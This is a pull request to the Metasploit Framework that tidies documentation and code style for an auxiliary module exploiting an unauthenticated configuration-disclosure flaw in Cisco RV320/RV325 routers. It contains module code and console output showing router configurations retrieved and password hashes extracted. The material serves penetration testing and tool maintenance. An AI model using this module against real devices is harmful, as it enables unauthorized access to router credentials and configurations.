### PR TITLE
cisco_rv320_config: Updated documentation and code style

### DIFF
--- a/documentation/modules/auxiliary/gather/cisco_rv320_config.md
+++ b/documentation/modules/auxiliary/gather/cisco_rv320_config.md
@@ -27,7 +27,7 @@ More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019
 
 ## Scenarios
 
-#### Against firmware version 1.4.2.15, which on the LAN side, port 443:
+#### Against firmware version 1.4.2.15, on the LAN interface, port 443:
 
 ```
 msf5 >
@@ -41,13 +41,13 @@ msf5 auxiliary(gather/cisco_rv320_config) > run
 [*] Auxiliary module execution completed
 ```
 
-#### Against firmware version 1.4.2.15, on the WAN side, port 8007:
+#### Against firmware version 1.4.2.15, on the WAN interface, port 8007:
 
 ```
 msf5 >
 msf5 > use auxiliary/gather/cisco_rv320_config
-msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 172.16.0.34
-RHOSTS => 192.168.1.1
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 203.0.113.54
+RHOSTS => 203.0.113.54
 msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007
 RPORT => 8007
 msf5 auxiliary(gather/cisco_rv320_config) > set SSL false
@@ -59,7 +59,7 @@ msf5 auxiliary(gather/cisco_rv320_config) > run
 [*] Auxiliary module execution completed
 ```
 
-#### Against firmware version 1.4.2.17, which on the LAN side, port 443:
+#### Against firmware version 1.4.2.17, on the LAN interface, port 443:
 
 ```
 msf5 >
@@ -73,7 +73,7 @@ msf5 auxiliary(gather/cisco_rv320_config) > run
 [*] Auxiliary module execution completed
 ```
 
-#### Against newer firmware (>= 1.4.2.19):
+#### Against newer firmware (>= 1.4.2.19), on the LAN interface, port 443:
 
 ```
 msf5 >
@@ -96,7 +96,7 @@ Hosts
 
 address      mac                name          os_name  os_flavor  os_sp  purpose  info  comments
 -------      ---                ----          -------  ---------  -----  -------  ----  --------
-172.16.0.34  70:E4:22:94:E7:20  router94e720  Cisco    RV320                            
+203.0.113.54 70:E4:22:94:E7:20  router94e720  Cisco    RV320                            
 192.168.1.1  70:E4:22:94:E7:20  router94e720  Cisco    RV320                            
 ```
 
@@ -107,7 +107,7 @@ Credentials
 
 host         origin       service          public  private                            realm  private_type
 ----         ------       -------          ------  -------                            -----  ------------
-172.16.0.34  192.168.1.1  8007/tcp (http)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash
+203.0.113.54 192.168.1.1  8007/tcp (http)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash
 192.168.1.1  192.168.1.1  443/tcp (https)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash
 ```
 
@@ -119,6 +119,6 @@ Loot
 
 host         service  type             name  content     info  path
 ----         -------  ----             ----  -------     ----  ----
-172.16.0.34           cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt
+203.0.113.54          cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190206213439_default_203.0.113.54_cisco.rv.config_791561.txt
 192.168.1.1           cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190206211312_default_192.168.1.1_cisco.rv.config_412095.txt
 ```

--- a/documentation/modules/auxiliary/gather/cisco_rv320_config.md
+++ b/documentation/modules/auxiliary/gather/cisco_rv320_config.md
@@ -15,7 +15,7 @@ More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019
  4. `run`
  5. Review the downloaded configuration file cited in the output.  For example:
 >```
->[+] Stored configuration (128658 bytes) to /home/administrator/.msf4/loot/20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt
+>[+] Stored configuration (128658 bytes) to /home/administrator/.msf4/loot/20190206213439_default_192.168.1.1_cisco.rv.config_791561.txt
 >```
  6. If the database is connected, review the `hosts`, `creds`, and `loot` commands
 
@@ -54,7 +54,7 @@ msf5 auxiliary(gather/cisco_rv320_config) > set SSL false
 SSL => false
 msf5 auxiliary(gather/cisco_rv320_config) > run
 
-[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
+[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_203.0.113.54_cisco.rv.config_434637.txt
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```

--- a/modules/auxiliary/gather/cisco_rv320_config.rb
+++ b/modules/auxiliary/gather/cisco_rv320_config.rb
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'           => 'Cisco RV320/RV326 Configuration Disclosure',
       'Description'    => %q{
           A vulnerability in the web-based management interface of Cisco Small Business
-          RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated,
+          RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,
           remote attacker to retrieve sensitive information. The vulnerability is due
           to improper access controls for URLs. An attacker could exploit this
           vulnerability by connecting to an affected device via HTTP or HTTPS and
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
       ])
   end
 
-  def report_cred(user,hash)
+  def report_cred(user, hash)
     service_data = {
       address: rhost,
       port: rport,
@@ -80,15 +80,14 @@ class MetasploitModule < Msf::Auxiliary
     print_good("Stored configuration (#{config.length} bytes) to #{stored_path}")
 
     # Report host information to database
-    mac = config.match(/^LANMAC=(.*)/)[1]
-    mac = "%s:%s:%s:%s:%s:%s" % [mac[0..1], mac[2..3], mac[4..5],
-                                 mac[6..7], mac[8..9], mac[10..11]]
     hostname = config.match(/^HOSTNAME=(.*)/)[1]
     model = config.match(/^MODEL=(.*)/)[1]
+    mac = config.match(/^LANMAC=(.*)/)[1]
+    mac = mac.scan(/\w{2}/).join(':')
     report_host(host: rhost,
                 mac: mac,
                 name: hostname,
-                os_name: "Cisco",
+                os_name: 'Cisco',
                 os_flavor: model)
 
     # Report password hashes to database
@@ -105,11 +104,11 @@ class MetasploitModule < Msf::Auxiliary
         'method'  => 'GET',
       }, 60)
     rescue OpenSSL::SSL::SSLError
-      fail_with(Failure::UnexpectedReply, "SSL handshake failed.  Consider setting 'SSL' to 'false' and trying again.")
+      fail_with(Failure::UnexpectedReply, 'SSL handshake failed.  Consider setting SSL to false and trying again.')
     end
 
     if res.nil?
-      fail_with(Failure::UnexpectedReply, "Empty response.  Please validate the RHOST and TARGETURI options and try again.")
+      fail_with(Failure::UnexpectedReply, 'Empty response.  Please validate the RHOST and TARGETURI options and try again.')
     elsif res.code != 200
       fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response.  Please validate the RHOST and TARGETURI options and try again.")
     end
@@ -118,7 +117,7 @@ class MetasploitModule < Msf::Auxiliary
     if body.match(/####sysconfig####/)
       parse_config(body)
     else body.include?"meta http-equiv=refresh content='0; url=/default.htm'"
-      fail_with(Failure::NotVulnerable, "Response suggests device is patched")
+      fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
     end
   end
 end


### PR DESCRIPTION
As `cisco_rv320_config` was a hackathon effort, there were some documentation flaws and code style issues that slipped through.  Thanks to feedback from the team, I'd like to make a few quick changes.  No features or functionality is changed here.

## Verification

This module has been tested by @asoto-r7.  See below.

- [x] Start `msfconsole`
- [x] `use auxiliary/gather/cisco_rv320_config`
- [x] `set RHOSTS 192.168.1.1`
- [x] `run`
- [x] Review documentation changes: [diff here](https://github.com/rapid7/metasploit-framework/pull/11399/files?short_path=aa034b3#diff-aa034b3d5bec6097cf6eca8f723caf23)

## Test output

```
msf5 > use auxiliary/gather/cisco_rv320_config 
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf5 auxiliary(gather/cisco_rv320_config) > run

[+] Stored configuration (128649 bytes) to /home/administrator/.msf4/loot/20190213155757_default_192.168.1.1_cisco.rv.config_701669.txt
[*] Auxiliary module execution completed
msf5 auxiliary(gather/cisco_rv320_config) > hosts

Hosts
=====

address      mac                name          os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----          -------  ---------  -----  -------  ----  --------
192.168.1.1  70:E4:22:94:E7:20  router94e720  Cisco    RV320                            

msf5 auxiliary(gather/cisco_rv320_config) > creds
Credentials
===========

host         origin       service          public  private                            realm  private_type
----         ------       -------          ------  -------                            -----  ------------
192.168.1.1  192.168.1.1  443/tcp (https)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash

msf5 auxiliary(gather/cisco_rv320_config) > loot

Loot
====

host         service  type             name  content     info  path
----         -------  ----             ----  -------     ----  ----
192.168.1.1           cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190213155944_default_192.168.1.1_cisco.rv.config_776168.txt
```